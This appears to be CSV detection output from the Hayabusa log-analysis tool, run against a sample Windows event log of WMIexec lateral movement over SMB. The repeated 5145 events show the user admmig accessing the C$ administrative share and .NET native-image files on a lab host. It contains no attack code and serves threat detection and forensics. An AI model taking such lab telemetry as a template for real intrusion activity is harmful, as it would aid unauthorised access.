10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 
